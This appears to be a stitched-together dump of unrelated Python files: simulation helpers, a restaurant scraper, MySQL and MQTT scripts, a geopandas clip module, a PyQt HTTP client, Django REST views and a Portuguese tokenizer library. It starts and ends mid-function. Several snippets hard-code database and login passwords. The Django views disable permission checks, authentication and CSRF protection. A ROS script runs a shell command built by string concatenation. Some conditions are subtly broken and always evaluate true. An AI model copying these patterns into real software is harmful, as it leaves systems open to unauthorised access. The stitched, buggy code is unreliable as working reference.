print('read_from_input: INVALID ARGUMENTS')
quit(1)
#print(lines)
for aline in lines:
words = remove_comment(aline).split()
if (len(words) > 2) and words[0] == key:
if type == 'af' or type == 'ArrayFloat':
af = []
for c in words[2:]:
cc = c.replace(",", "") # remove trailing "," if any
af.append(float(cc))
return af
elif type == 'f' or type == 'Float':
return float(words[2])
elif type == 'b' or type == 'Bool':
s = words[2].lower()
if s[0] == '"' or s[0] == "'":
w = s[1:-1]
else:
w = s
if w == 'y' or w == 'yes' or 'true':
return True
else:
return False
elif type == 'i' or type == 'Int':
return int(words[2])
elif type == 's' or type == 'String':
# remove leading and tailing " if any
s = ' '.join(words[2:])
if s[0] == '"' or s[0] == "'":
return s[1:-1]
else:
return s
elif type == 'aw' or 'ArrayWord':
# print(words[2:])
# print(words[2:-1])
arr = []
for w in words[2:]:
wcut = ''
for c in w:
if c == '"' or c == "'" or c == ",":
continue
wcut += c
if wcut != '':
arr.append(wcut)
return arr
else:
return words[2:]
print('read_from_input: KEY %s NOT FOUND in %s' % (key, file_name))
quit(1)
return
def read_from_input2(s_file_name, s_key, s_subkey, s_type):
f = open(s_file_name, 'r')
lines = f.readlines()
outer_dict = {}
print('FUNCTION: read_from_input')
i = 0
while i < len(lines):
words = remove_comment(lines[i]).split()
l = len(words)
i += 1
if l == 0: continue
if l == 1:
key = words[0]
# if the next line not starting by '{'
# now i already points to the next line
if lines[i][0] != '{':
print('Error: invalid input file at line %d' % (i + 1))
quit()
else:
i += 1
inter_dict = {}
while lines[i][0] != '}':
wo = remove_comment(lines[i]).split()
inter_dict[wo[0]] = wo[2:]
i += 1
i += 1
outer_dict[key] = inter_dict
if l >= 3:
key = words[0]
outer_dict[key] = words[2:]
if s_key == '':
ret = outer_dict[s_subkey]
else:
ret = outer_dict[s_key][s_subkey]
if s_type == 'f':
print('=' * 30)
return float(ret)
elif s_type == 's':
print('=' * 30)
return ret
elif s_type == 'lf':
l_ret = []
for x in ret:
l_ret.append(float(x))
return l_ret
else:
print('Error: unsupported type: ', s_type)
print('=' * 30)
quit()
# ******************************************
# Distance between 2 identified vertices
# vertice should has from [x, y] as a list
# ******************************************
def distance2d(u, v):
# print(u,v)
return np.sqrt((u[1] - v[1]) * (u[1] - v[1]) + (u[0] - v[0]) * (u[0] - v[0]))
# domain = [Lx, Ly]
def distance2dPBC(u, v, domain, pbc):
dx = u[0] - v[0]
dy = u[1] - v[1]
Lx = domain[0]
Ly = domain[1]
if pbc:
if dx > Lx / 2: dx -= Lx
if dx < -Lx / 2: dx += Lx
if dy > Ly / 2: dy -= Ly
if dy < -Ly / 2: dy += Ly
return np.sqrt(dx*dx + dy*dy)
# depth first search
def dfs(graph, start):
visited, stack = set(), [start]
while stack:
vertex = stack.pop()
if vertex not in visited:
visited.add(vertex)
stack.extend(graph[vertex] - visited)
return visited
# ******************************************
# displace set of points by a vector
# ******************************************
def displace(in_array, vector):
if len(in_array) == 0:
return
m = len(in_array[0])
for i in range(len(in_array)):
for j in range(m):
in_array[i][j] += vector[j]
# ******************************************
# rotate set of Points by an angle theta radian
# ******************************************
def rotate2d(in_array_2d, angle):
# rotation maxtrix
# | cos -sin|
# | sin cos|
cos = np.cos(angle)
sin = np.sin(angle)
for i in range(len(in_array_2d)):
x = in_array_2d[i][0]
y = in_array_2d[i][1]
in_array_2d[i][0] = x * cos - y * sin
in_array_2d[i][1] = sin * x + cos * y
def make_directory(directory):
if not os.path.exists(directory):
os.makedirs(directory)
return
# angle btw 2 vectors
def angle2d(first, middle, end):
u = [first[0] - middle[0], first[1] - middle[1]]
v = [end[0] - middle[0], end[1] - middle[1]]
uv = u[0]*v[0] + u[1]*v[1]
au = np.sqrt(u[0]*u[0] + u[1]*u[1])
av = np.sqrt(v[0]*v[0] + v[1]*v[1])
costheta = uv/(au*av)
return np.arccos(costheta)*180.0/np.pi
# work for list of [], that is [[],[]]
def shift_array2(in_array, n):
ret_array = []
for x in in_array:
ret_array.append([x[0] + n, x[1] + n])
return ret_array
def save_to_file(list, filename, dirname):
if len(list) == 0:
return
make_directory(dirname)
f = open(dirname + '/' + filename, 'w')
f.write('# %s\n' % (os.path.basename(__file__)))
f.write('# %d lines\n' % (len(list)))
for row in list:
for x in row:
f.write('%g ' % x)
f.write('\n')
f.close()
print('OutFile: %s' % filename)
return
def plot_list(data, plottype, scale, title, legend, label, figname, dirname, showplot):
import matplotlib.pyplot as plt
# scale = [x_scale, y_scale]
if len(data) == 0:
return
make_directory(dirname)
fig, ax = plt.subplots()
x = []
n = len(data[0])
# print('n = %d' % n)
# 1st col = x
# 2nd col = y
# nth col = yn
y = []
for i in range(n - 1):
y.append([])
for v in data:
x.append(v[0]/scale[0])
for i in range(n - 1):
y[i].append(v[i + 1]/scale[i + 1])
lines = []
if plottype == 'SCATTER':
for i in range(n - 1):
ax.scatter(x, y[i], s=1, alpha=0.5)
#ax.add_artist(legend[i])
elif plottype == 'LINE':
for i in range(n - 1):
lines += ax.plot(x, y[i], marker='.', linestyle='-')
else:
print('plot_list::error::invalid plottype')
quit()
ax.legend(lines[:], legend, loc='upper right', frameon=False)
ylo = []
yhi = []
for i in range(n - 1):
ylo.append(min(y[i]))
yhi.append(max(y[i]))
ax.set(ylim=(1.1*min(ylo), 1.1*max(yhi)))
#ax.set_aspect('equal')
plt.title(title, color='green')
plt.grid(True)
plt.xlabel(label[0])
plt.ylabel(label[1])
plt.savefig(dirname + '/' + figname)
if showplot:
plt.show()
plt.close()
return
def cast_type(datType, dat):
if datType == 'float':
return float(dat)
if datType == 'double':
return float(dat)
if datType == 'int':
return int(dat)
if datType == 'string':
return str(dat)
return dat
def save_points_file(points, s_format, text, dirname, filename):
if len(points) == 0:
return
make_directory(dirname)
fout = open(dirname + '/' + filename, 'w')
m = len(points)
if len(points) == 0: return
num_column = len(points[0])
fformat = []
for i in range(num_column):
fformat.append('%' + s_format[i] + ' ')
fout.write('%i %s\n' % (m, text))
for i in range(m):
for col in range(num_column):
fout.write(fformat[col] % (points[i][col]))
fout.write('\n')
fout.close()
def plot_vertices_and_bonds(l_vertices, l_bonds, dirname, filename):
import matplotlib.pyplot as plt
#print('-'*30)
#print("FUNCTION: plot_vertices_and_bonds: ")
fig, ax = plt.subplots()
listx = []
listy = []
for v in l_vertices:
listx.append(v[0])
listy.append(v[1])
for b in l_bonds:
v1 = b[0]
v2 = b[1]
x = [l_vertices[v1][0], l_vertices[v2][0]]
y = [l_vertices[v1][1], l_vertices[v2][1]]
ax.plot(x, y, linestyle ="solid", color = 'g', linewidth = 1)
#scale = 1e-2*len(l_vertices)
ax.scatter(listx, listy, color='b', alpha=0.9, s=5e-2 * len(l_vertices))
ax.set_aspect('equal')
plt.grid(True)
if filename != '':
make_directory(dirname)
plt.savefig(dirname + '/' + filename + '.png')
else:
plt.show()
plt.close()
#print('=' * 30)
return # // plot_sphere()
def make_input2d(botnames, anchornames, outfile):
f = open(outfile, 'w')
f.write("\tposn_shift = 0.0, 0.0\n")
f.write("\tmax_levels = MAX_LEVELS\n\n")
f.write('\tstructure_names = ')
f.write( '"' + botnames[0] + '"')
for name in (botnames[1:] + anchornames):
f.write(', "' + name + '"')
f.write('\n')
for name in (botnames + anchornames):
f.write("\n\t\t" + name + " { " + "\n")
f.write("\t\t level_number = MAX_LEVELS - 1 " + "\n" +
"\t\t uniform_spring_stiffness = 0.0\n")
f.write("\t\t}\n")
f.close()
def read_xy_file(filename):
lines = open(filename, 'r').readlines()
vertices =[]
for line in lines:
w = remove_comment(line).split()
if len(w) <= 1:
continue
vertices.append([float(w[0]), float(w[1])])
return vertices
def plot_vertices_list(list_vertices, point_sizes):
import matplotlib.pyplot as plt
fig, ax = plt.subplots()
for i in range(len(list_vertices)):
vert = list_vertices[i]
x = []
y = []
color = 'C%d' % ((i + 1) % 10)
#color = 'C%d' % (i + 1)
for v in vert:
x.append(v[0])
y.append(v[1])
#scale = 1e-2*len(l_vertices)
ax.scatter(x, y, color=color, alpha=0.9, s=point_sizes)
ax.set_aspect('equal')
plt.grid(True)
plt.show()
plt.close()
#print('=' * 30)
return # // plot_sphere()
def triangle(in_vert):
from scipy.spatial import Delaunay
bonds = []
tri = Delaunay(in_vert)
indptr = tri.vertex_neighbor_vertices[0]
vertices = tri.vertex_neighbor_vertices[1]
simplices = tri.simplices
for k in range(len(in_vert)):
ver = vertices[indptr[k]:indptr[k + 1]]
for kn in ver:
if kn > k:
bonds.append([k, kn])
return simplices, bonds
def polygon_area(points):
from scipy.spatial import ConvexHull
hull = ConvexHull(points)
return hull.volume
def constraintib_database(*argc):
outfile = argc[0]
structure_names = argc[1]
trans_mom = argc[2]
rot_mom = argc[3]
lag_pos_update = argc[4]
centers = argc[5]
all_names = [name for name in structure_names]
if len(argc) > 6:
bdry_name = argc[6]
all_names.append(argc[6])
# IBStandardInitializer
f = open(outfile, 'w')
f.write('IBStandardInitializer {\n')
f.write("\t max_levels = MAX_LEVELS\n")
f.write("\t structure_names = ")
for name in all_names[0:-1]:
f.write('"' + name + '"' + ', ')
f.write('"' + all_names[-1] + '"' + '\n')
for name in all_names:
f.write("\t " + name + " {\n")
f.write("\t\tlevel_number = MAX_LEVELS - 1 \n" +
"\t }\n")
f.write("}\n\n")
# ConstraintIBKinematics
f.write('ConstraintIBKinematics {\n')
id = 0
for name in structure_names:
f.write("\t " + name + " {\n")
f.write('\t\tstructure_names = ' + '"' + name + '"\n')
f.write("\t\tstructure_levels = MAX_LEVELS - 1\n")
f.write("\t\tcalculate_translational_momentum = %d,%d,%d\n" % (trans_mom[0], trans_mom[1], trans_mom[2]))
f.write("\t\tcalculate_rotational_momentum = %d,%d,%d\n" % (rot_mom[0], rot_mom[1], rot_mom[2]))
f.write('\t\tlag_position_update_method = ' + '"' + lag_pos_update + '"\n')
f.write('\t\ttagged_pt_identifier = MAX_LEVELS - 1, 0\n')
# f.write('\t\tbody_mesh = BODY_MESH\n')
f.write('\t\tradius_0 = RADIUS_LARGE\n')
f.write('\t\tradius_1 = RADIUS_SMALL\n')
f.write('\t\tamplitude = AMPLITUDE\n')
f.write('\t\tfrequency = FREQUENCY\n')
cent = centers[id]
for j in range(len(cent)):
f.write('\t\tcenter_%d = %g, %g\n' % (j, cent[j][0], cent[j][1]))
f.write("\t }\n")
id += 1
if len(argc) > 6:
f.write("\t " + bdry_name + " {\n")
f.write('\t\tstructure_names = ' + '"' + bdry_name + '"\n')
f.write("\t\tstructure_levels = MAX_LEVELS - 1\n")
f.write("\t\tcalculate_translational_momentum = 0, 0, 0\n")
f.write("\t\tcalculate_rotational_momentum = 0, 0, 0\n")
f.write('\t\tlag_position_update_method = \"CONSTRAINT_VELOCITY\"\n')
f.write('\t\ttagged_pt_identifier = MAX_LEVELS - 1, 0\n')
f.write("\t }\n")
f.write("}\n")
f.close()
print('copy %s into input2d' % outfile)
return |
import requests
from bs4 import BeautifulSoup
import pandas as pd
url = 'https://www.swiggy.com/hyderabad/south-indian-collection'
resp1 = requests.get(url)
print(resp1)
resp = resp1.content
soup = BeautifulSoup(resp, 'html.parser')
soups = soup.find_all('div', class_='_3FR5S')
names = []
items = []
reatings = []
prices = []
offers = []
k = 1
for allin in soups:
try:
name = allin.find('div', class_='nA6kb')
# print(k, '', 'name of restaurant :', name.text.strip())
names.append(name)
item = allin.find('div', class_='_1gURR')
# print('all items:', item.text)
items.append(item.text)
ratings = allin.find('div', class_='_9uwBC')
# print('ratings:', ratings.text)
reatings.append(ratings.text)
price = allin.find('div', class_='nVWSi')
# print('price:', price.text)
prices.append(price.text)
offer = allin.find('span', class_='sNAfh')
# print('your ofers on itms is: ', offer)
offers.append(offer.text)
except:
pass
print('------')
k += 1
if k == 2:
continue
info = {'name': names, 'items': items, 'rating': reatings, 'price': prices}
data = pd.DataFrame(data=info)
print(data)
#print(data['items'])
print(data['name'].describe())
cd=data.to_csv('data.xlsx') |
import mysql.connector
conn = mysql.connector.connect(host='127.0.0.1', database='Test', user='root', password='gena')
mycursor = conn.cursor()
mycursor.execute('SELECT * FROM Test.Users')
result = mycursor.fetchall()
for (Id,Name,Email) in result:
print (Id)
print (Name + '/' + Email)
print (Email)
conn.close
import pymysql
pymysql.install_as_MySQLdb()
conn1 = pymysql.connect(host='127.0.0.1', database='Test', user='root', password='gena')
mycursor = conn1.cursor()
mycursor.execute('SELECT * FROM Test.Users')
result = mycursor.fetchall()
for (Id,Name,Email) in result:
print (Id)
print (Name + '/' + Email)
print (Email)
conn1.close |
import rospkg
import subprocess
import os
# get an instance of RosPack with the default search paths
rospack = rospkg.RosPack()
print('\033[93mYOU NEED TO HAVE A ROSCORE RUNNING!\033[0m')
# Get the file path to the default pcd file created by smb_slam
mapPath = rospack.get_path('smb_slam') + '/compslam_map.pcd'
# Get the path to the script
smb_nav_path = rospack.get_path('smb_navigation')
# Make the script executable
os.system('chmod +x ' + smb_nav_path + '/script/pcd_to_gridmap.sh')
# Set the arguments and run the script
output_path = smb_nav_path + '/data/test'
run_rviz = 'true'
command_string = smb_nav_path + '/script/pcd_to_gridmap.sh ' + mapPath + ' ' + output_path + ' ' + run_rviz
os.system(command_string)
|
import paho.mqtt.client as MQTTClient
import time
import sys
import os
client = MQTTClient.Client()
HOST = 'gateway-pi.local'
PORT = 1883
HB_TOPIC = '/heart_beat'
def main():
client.DEBUG = True
try:
client.connect(HOST, PORT)
except Exception:
print("Error while connecting to mqtt broker")
sys.exit()
print("Connected to {}".format(HOST))
while True:
tmp = os.popen("ps -Af").read()
proccount = tmp.count('org.wso2.carbon')
if proccount > 0:
print('sending HB')
data = 'HB'
client.publish(HB_TOPIC, str.encode(data))
time.sleep(1)
if __name__ == '__main__':
main()
|
lines = []
with open("inputData.txt", "r") as infile:
for line in infile:
lines.append(line.replace('\n', '').replace('\r', ''))
realLetters = 0
codeLetters = 0
for line in lines:
codeLetters += len(line)
lineWithoutQuotes = line[1:-1]
decodedString = bytes(lineWithoutQuotes, "utf-8").decode("unicode_escape")
realLetters += len(decodedString)
difference = codeLetters - realLetters
print(str(difference))
|
"""
geopandas.clip
==============
A module to clip vector data using GeoPandas.
"""
import warnings
import numpy as np
import pandas as pd
from shapely.geometry import Polygon, MultiPolygon
from geopandas import GeoDataFrame, GeoSeries
from geopandas.array import _check_crs, _crs_mismatch_warn
def _clip_points(gdf, poly):
"""Clip point geometry to the polygon extent.
Clip an input point GeoDataFrame to the polygon extent of the poly
parameter. Points that intersect the poly geometry are extracted with
associated attributes and returned.
Parameters
----------
gdf : GeoDataFrame, GeoSeries
Composed of point geometry that will be clipped to the poly.
poly : (Multi)Polygon
Reference geometry used to spatially clip the data.
Returns
-------
GeoDataFrame
The returned GeoDataFrame is a subset of gdf that intersects
with poly.
"""
return gdf.iloc[gdf.sindex.query(poly, predicate="intersects")]
def _clip_line_poly(gdf, poly):
"""Clip line and polygon geometry to the polygon extent.
Clip an input line or polygon to the polygon extent of the poly
parameter. Parts of Lines or Polygons that intersect the poly geometry are
extracted with associated attributes and returned.
Parameters
----------
gdf : GeoDataFrame, GeoSeries
Line or polygon geometry that is clipped to poly.
poly : (Multi)Polygon
Reference polygon for clipping.
Returns
-------
GeoDataFrame
The returned GeoDataFrame is a clipped subset of gdf
that intersects with poly.
"""
gdf_sub = gdf.iloc[gdf.sindex.query(poly, predicate="intersects")]
# Clip the data with the polygon
if isinstance(gdf_sub, GeoDataFrame):
clipped = gdf_sub.copy()
clipped[gdf.geometry.name] = gdf_sub.intersection(poly)
else:
# GeoSeries
clipped = gdf_sub.intersection(poly)
return clipped
def clip(gdf, mask, keep_geom_type=False):
"""Clip points, lines, or polygon geometries to the mask extent.
Both layers must be in the same Coordinate Reference System (CRS).
The `gdf` will be clipped to the full extent of the clip object.
If there are multiple polygons in mask, data from `gdf` will be
clipped to the total boundary of all polygons in mask.
Parameters
----------
gdf : GeoDataFrame or GeoSeries
Vector layer (point, line, polygon) to be clipped to mask.
mask : GeoDataFrame, GeoSeries, (Multi)Polygon
Polygon vector layer used to clip `gdf`.
The mask's geometry is dissolved into one geometric feature
and intersected with `gdf`.
keep_geom_type : boolean, default False
If True, return only geometries of original type in case of intersection
resulting in multiple geometry types or GeometryCollections.
If False, return all resulting geometries (potentially mixed-types).
Returns
-------
GeoDataFrame or GeoSeries
Vector data (points, lines, polygons) from `gdf` clipped to
polygon boundary from mask.
Examples
--------
Clip points (global cities) with a polygon (the South American continent):
>>> world = geopandas.read_file(
... geopandas.datasets.get_path('naturalearth_lowres'))
>>> south_america = world[world['continent'] == "South America"]
>>> capitals = geopandas.read_file(
... geopandas.datasets.get_path('naturalearth_cities'))
>>> capitals.shape
(202, 2)
>>> sa_capitals = geopandas.clip(capitals, south_america)
>>> sa_capitals.shape
(12, 2)
"""
if not isinstance(gdf, (GeoDataFrame, GeoSeries)):
raise TypeError(
"'gdf' should be GeoDataFrame or GeoSeries, got {}".format(type(gdf))
)
if not isinstance(mask, (GeoDataFrame, GeoSeries, Polygon, MultiPolygon)):
raise TypeError(
"'mask' should be GeoDataFrame, GeoSeries or"
"(Multi)Polygon, got {}".format(type(mask))
)
if isinstance(mask, (GeoDataFrame, GeoSeries)):
if not _check_crs(gdf, mask):
_crs_mismatch_warn(gdf, mask, stacklevel=3)
if isinstance(mask, (GeoDataFrame, GeoSeries)):
box_mask = mask.total_bounds
else:
box_mask = mask.bounds
box_gdf = gdf.total_bounds
if not (
((box_mask[0] <= box_gdf[2]) and (box_gdf[0] <= box_mask[2]))
and ((box_mask[1] <= box_gdf[3]) and (box_gdf[1] <= box_mask[3]))
):
return gdf.iloc[:0]
if isinstance(mask, (GeoDataFrame, GeoSeries)):
poly = mask.geometry.unary_union
else:
poly = mask
geom_types = gdf.geometry.type
poly_idx = np.asarray((geom_types == "Polygon") | (geom_types == "MultiPolygon"))
line_idx = np.asarray(
(geom_types == "LineString")
| (geom_types == "LinearRing")
| (geom_types == "MultiLineString")
)
point_idx = np.asarray((geom_types == "Point") | (geom_types == "MultiPoint"))
geomcoll_idx = np.asarray((geom_types == "GeometryCollection"))
if point_idx.any():
point_gdf = _clip_points(gdf[point_idx], poly)
else:
point_gdf = None
if poly_idx.any():
poly_gdf = _clip_line_poly(gdf[poly_idx], poly)
else:
poly_gdf = None
if line_idx.any():
line_gdf = _clip_line_poly(gdf[line_idx], poly)
else:
line_gdf = None
if geomcoll_idx.any():
geomcoll_gdf = _clip_line_poly(gdf[geomcoll_idx], poly)
else:
geomcoll_gdf = None
order = pd.Series(range(len(gdf)), index=gdf.index)
concat = pd.concat([point_gdf, line_gdf, poly_gdf, geomcoll_gdf])
if keep_geom_type:
geomcoll_concat = (concat.geom_type == "GeometryCollection").any()
geomcoll_orig = geomcoll_idx.any()
new_collection = geomcoll_concat and not geomcoll_orig
if geomcoll_orig:
warnings.warn(
"keep_geom_type can not be called on a "
"GeoDataFrame with GeometryCollection."
)
else:
polys = ["Polygon", "MultiPolygon"]
lines = ["LineString", "MultiLineString", "LinearRing"]
points = ["Point", "MultiPoint"]
# Check that the gdf for multiple geom types (points, lines and/or polys)
orig_types_total = sum(
[
gdf.geom_type.isin(polys).any(),
gdf.geom_type.isin(lines).any(),
gdf.geom_type.isin(points).any(),
]
)
# Check how many geometry types are in the clipped GeoDataFrame
clip_types_total = sum(
[
concat.geom_type.isin(polys).any(),
concat.geom_type.isin(lines).any(),
concat.geom_type.isin(points).any(),
]
)
# Check there aren't any new geom types in the clipped GeoDataFrame
more_types = orig_types_total < clip_types_total
if orig_types_total > 1:
warnings.warn(
"keep_geom_type can not be called on a mixed type GeoDataFrame."
)
elif new_collection or more_types:
orig_type = gdf.geom_type.iloc[0]
if new_collection:
concat = concat.explode()
if orig_type in polys:
concat = concat.loc[concat.geom_type.isin(polys)]
elif orig_type in lines:
concat = concat.loc[concat.geom_type.isin(lines)]
# Return empty GeoDataFrame or GeoSeries if no shapes remain
if len(concat) == 0:
return gdf.iloc[:0]
# Preserve the original order of the input
if isinstance(concat, GeoDataFrame):
concat["_order"] = order
return concat.sort_values(by="_order").drop(columns="_order")
else:
concat = GeoDataFrame(geometry=concat)
concat["_order"] = order
return concat.sort_values(by="_order").geometry
|
__all__ = [] # No root imports
|
# -*- coding: utf-8 -*-
# @Author: Safer
# @Date: 2016-08-18 21:12:14
# @Last Modified by: Safer
# @Last Modified time: 2016-08-26 00:22:03
import sys
from PyQt5.QtWidgets import QApplication
from PyQt5.QtCore import QEventLoop, QUrl, QByteArray
from PyQt5.QtNetwork import QNetworkAccessManager, QNetworkRequest
class HttpRequests(QNetworkAccessManager):
def __init__(self, parent=None, baseUrl='http://at.com'):
super(HttpRequests, self).__init__(parent)
self.baseUrl = baseUrl
self._init_()
def _init_(self):
self.finished.connect(self.complete)
pass
def rget(self, url='', params={}):
param = self._getUrlParamFormat(params)
url = self.baseUrl + url + str(param)
req = QNetworkRequest(QUrl(url))
req.setHeader(QNetworkRequest.ContentTypeHeader,
"text/json;charset=utf-8")
return self.get(req)
# response.finished.connect(self.complete)
# response.redirected.connect(self.redirected)
# response.error.connect(self.error)
# response.sslErrors.connect(self.sslErrors)
# self.response = response;
# return data
def rpost(self, url, params):
params = b'email=819308322@qq.com&password=goodluck'
params = QByteArray(params)
url = self.baseUrl + url
req = QNetworkRequest(QUrl(url))
req.setHeader(QNetworkRequest.ContentTypeHeader,
"text/json;charset=utf-8")
req.setHeader(QNetworkRequest.ContentTypeHeader,
"application/x-www-form-urlencoded")
return self.post(req, params)
def put(self):
pass
def delete(self):
pass
def complete(self, reply):
print('complete', str(reply.readAll(), encoding="utf-8"))
pass
def redirected(self):
print('redirected')
def error(self, code):
print('error')
def sslErrors(self):
print('ssl error')
# get url 参数解析
def _getUrlParamFormat(self, params):
mark = ['?', '&', '=', 0, '']
for i in params:
m = mark[0] if mark[3] == 0 else mark[1]
mark[4] += (m + i + mark[2] + str(params[i]))
mark[3] += 1
param = mark[4]
return param
if __name__ == '__main__':
app = QApplication(sys.argv)
r = HttpRequests()
######## get ########
# params = {'id': '45'}
# url = "/tasks/info"
# data = r.rget(url, params)
# data = eval(data.readAll())
######## post ########
params = {'email': '819308322@qq.com', 'password': 'goodluck'}
url = "/auth/login"
# url = "/tasks/test"
r = HttpRequests()
data = r.rpost(url, params)
print(data)
sys.exit(app.exec_())
|
# В римской системе счисления для обозначения чисел используются следующие символы (справа записаны числа, которым они соответствуют в десятичной системе счисления):
# I = 1
# V = 5
# X = 10
# L = 50
# C = 100
# D = 500
# M = 1000
# Будем использовать вариант, в котором числа 4, 9, 40, 90, 400 и 900 записываются как вычитание из большего числа меньшего: IV, IX, XL, XC, CD и CM, соответственно.
# Формат ввода:
# Строка, содержащая натуральное число n
# , 0<n<4000
# .
# Формат вывода:
# Строка, содержащая число, закодированное в римской системе счисления.
# Sample Input 1:
# 1984
# Sample Output 1:
# MCMLXXXIV
# Sample Input 2:
# 9
# Sample Output 2:
# IX
# Sample Input 3:
# 3
# Sample Output 3:
# III
def DToRoman(num):
D2R = {1000:"M",900:"CM",500:"D",400:"CD",100:"C",
90:"XC",50:"L",40:"XL",10:"X",
9:"IX",5:"V",4:"IV",1:"I"}
dr=[1000,900,500,400,100,90,50,40,10,9,5,4,1]
i = 0
s=""
while num > 0:
if num<dr[i]:
i+=1
continue
else:
r = num//dr[i]
num = num % dr[i]
s=s+r*D2R[dr[i]]
return s
s = int(input())
print(DToRoman(s)) |
import os
import typing as typ
from pathlib import Path
from chaban.core.exceptions import ImproperlyConfiguredError
from chaban.utils import MetaSingleton
from . import global_settings
class Settings(metaclass=MetaSingleton):
TELEGRAM_TOKEN: str
BASE_DIR: typ.Union[str, Path]
PACKAGES: typ.List[str]
_settings_module = None
_cache: typ.Dict[str, typ.Any] = {}
def __getattr__(self, name: str) -> typ.Any:
if self._settings_module is None:
self._setup()
if name not in self._cache:
self._cache[name] = getattr(self._settings_module, name)
return self._cache[name]
def _setup(self) -> None:
env_var_name = global_settings.CHABAN_SETTINGS_MODULE_ENV_VAR
settings_env = os.getenv(env_var_name)
if settings_env is None:
raise ImproperlyConfiguredError(
"{} env var is required, but not set".format(env_var_name)
)
self._settings_module = __import__(settings_env)
settings = Settings()
|
import json
from django.http import HttpResponse
from django.views.decorators.csrf import csrf_exempt
from django.views.generic import View
from rest_framework import generics
from clasificador.models import ClassifierModel
from clasificador.serializers import ClassifierModelSerializer
from documentos.helpers import create_new_model
from documentos.models import GoalStandard
class ClassifierModelList(generics.ListCreateAPIView):
queryset = ClassifierModel.objects.all().order_by('created')
serializer_class = ClassifierModelSerializer
def check_permissions(self, request):
return True
def perform_authentication(self, request):
pass
class ClassifierModelDetail(generics.RetrieveUpdateAPIView):
queryset = ClassifierModel.objects.all()
serializer_class = ClassifierModelSerializer
lookup_field = 'datatxt_id'
def check_permissions(self, request):
return True
def perform_authentication(self, request):
pass
class ClassifierCreate(View):
@csrf_exempt
def dispatch(self, request, *args, **kwargs):
return super(ClassifierCreate, self).dispatch(
request, *args, **kwargs)
def post(self, request):
gs = GoalStandard.objects.all().order_by('-created')[0]
keyentities = True
if request.POST.get('use_keyentities') == 'false':
keyentities = False
res = create_new_model(
gs,
request.POST.get('name'),
request.POST.get('description'),
int(request.POST.get('topic_limit')),
True,
keyentities,
)
return HttpResponse(
json.dumps({'result': res}), 'application/json'
)
|
"""
Biblioteca criada com todas as funções criadas em Programação 2
"""
"""
Um n-grama é uma sequência de caracteres de tamanho n, por exemplo:
"goiaba" --> 1-grama: g, o, i, a, b, a
2-grama: go, oi, ia, ab, ba
3-grama: goi, oia, iab, aba
...
Construa a função ngrama(<texto>, <tam>) que retorna uma lista contendo os n-gramas de tamanho <tam> de <texto>
"""
def nGrama(pTexto, tam):
ngramas = []
for i in range(len(pTexto)):
if i <= len(pTexto) - tam:
ngramas.append(pTexto[i: tam + i])
#
#
return ngramas
#
def insereEspacos(pTexto):
textoNovo = ""
i = 0
while i < len(pTexto):
if pTexto[i].isdigit() and (i + 1) < len(pTexto) and pTexto[i+1].isalpha():
textoNovo += pTexto[i] + " "
elif pTexto[i].isalnum():
textoNovo += pTexto[i]
else:
textoNovo += " " + pTexto[i] + " "
#
i += 1
#
return textoNovo
#
def tokenizador(txt):
lstTokens = []
strbuffer = ''
lstposicoes = []
pos = 0
separador = selecionaSeparadores(txt)
for pos in range(len(txt)):
if txt[pos] not in separador:
strbuffer += txt[pos]
else:
if strbuffer != '':
lstTokens.append(strbuffer)
lstposicoes.append(pos-len(strbuffer))
strbuffer = ''
if txt[pos] not in [' ','\t']:
lstTokens.append(txt[pos])
lstposicoes.append(pos)
if strbuffer != '':
lstTokens.append(strbuffer)
lstposicoes.append(pos-len(strbuffer))
return lstTokens, lstposicoes
#
def tokenizadorv2(txt, separador):
lstTokens = []
strbuffer = ''
lstposicoes = []
pos = 0
#separador = selecionaSeparadores(txt)
for pos in range(len(txt)):
if txt[pos] not in separador:
strbuffer += txt[pos]
else:
if strbuffer != '':
lstTokens.append(strbuffer)
lstposicoes.append(pos-len(strbuffer))
strbuffer = ''
if txt[pos] not in [' ','\t']:
lstTokens.append(txt[pos])
lstposicoes.append(pos)
if strbuffer != '':
lstTokens.append(strbuffer)
lstposicoes.append(pos-len(strbuffer))
return lstTokens, lstposicoes
#
def separaPal(pTexto):
strSeparadores = ' ,!?.:;/-_\\()[]{}><\n\t'
strBuffer = ""
lstPalavras = []
for i in range(len(pTexto)):
if pTexto[i] not in strSeparadores:
strBuffer += pTexto[i]
elif strBuffer != "":
lstPalavras.append(strBuffer)
strBuffer = ""
#
#
if strBuffer != "":
lstPalavras.append(strBuffer)
#
return lstPalavras
#
def separaPal2(pTexto):
textoAux = insereEspacos(pTexto)
lstPals = textoAux.split()
pos = 0
for pos in range(len(lstPals)):
if not pos.isalpha():
del(pos)
else:
pos += 1
#
#
return lstPals
#
def separaPalComParametro(pTexto, strSeparadores):
strBuffer = ""
lstPalavras = []
for i in range(len(pTexto)):
if pTexto[i] not in strSeparadores:
strBuffer += pTexto[i]
elif strBuffer != "":
lstPalavras.append(strBuffer)
strBuffer = ""
#
#
if strBuffer != "":
lstPalavras.append(strBuffer)
#
return lstPalavras
#
def intersec(pTexto1, pTexto2):
lstTexto1 = separaPal(pTexto1)
lstTexto2 = separaPal(pTexto2)
inter = []
for texto1 in lstTexto1:
for texto2 in lstTexto2:
if texto1 == texto2:
if texto1 not in inter:
inter.append(texto1)
#
#
#
#
return inter
#
def corrente(pTexto, pPosicao):
strSeparadores = " ,.:;!?"
esquerda = pPosicao; direita = pPosicao; palavra = "Não tem nada aqui :/"
if pTexto[esquerda] not in strSeparadores:
while esquerda >= 0 and pTexto[esquerda] not in strSeparadores:
esquerda -= 1
#
while direita < len(pTexto) and pTexto[direita] not in strSeparadores:
direita += 1
#
palavra = pTexto[esquerda + 1:direita]
else:
palavra = "None"
#
return palavra
#
def anterior(pTexto, pPosicao):
strSeparadores = " ,.:;!?"
aux = pPosicao
if pTexto[aux] not in strSeparadores:
while aux >= 0 and pTexto[aux] not in strSeparadores:
aux -= 1
#
#
if pTexto[aux] in strSeparadores:
while aux >= 0 and pTexto[aux] in strSeparadores:
aux -= 1
#
#
if aux < 0:
return "None"
else:
return corrente(pTexto, aux)
#
#
def proximo(pTexto, pPosicao):
strSeparadores = " ,.:;!?"
aux = pPosicao
if pTexto[aux] not in strSeparadores:
while aux < len(pTexto) and pTexto[aux] not in strSeparadores:
aux += 1
#
#
if pTexto[aux] in strSeparadores:
while aux < len(pTexto) and pTexto[aux] in strSeparadores:
aux += 1
#
#
if aux >= len(pTexto):
return "None"
else:
return corrente(pTexto, aux)
#
#
def removeAcento(pTexto):
strSemAcento = "aeiou"
strComAcento = "áàâãéèêẽíìîĩóòôõúùûũ"
novoTexto = ""; j = 0; i = 0
divisor = 4
while i < len(pTexto):
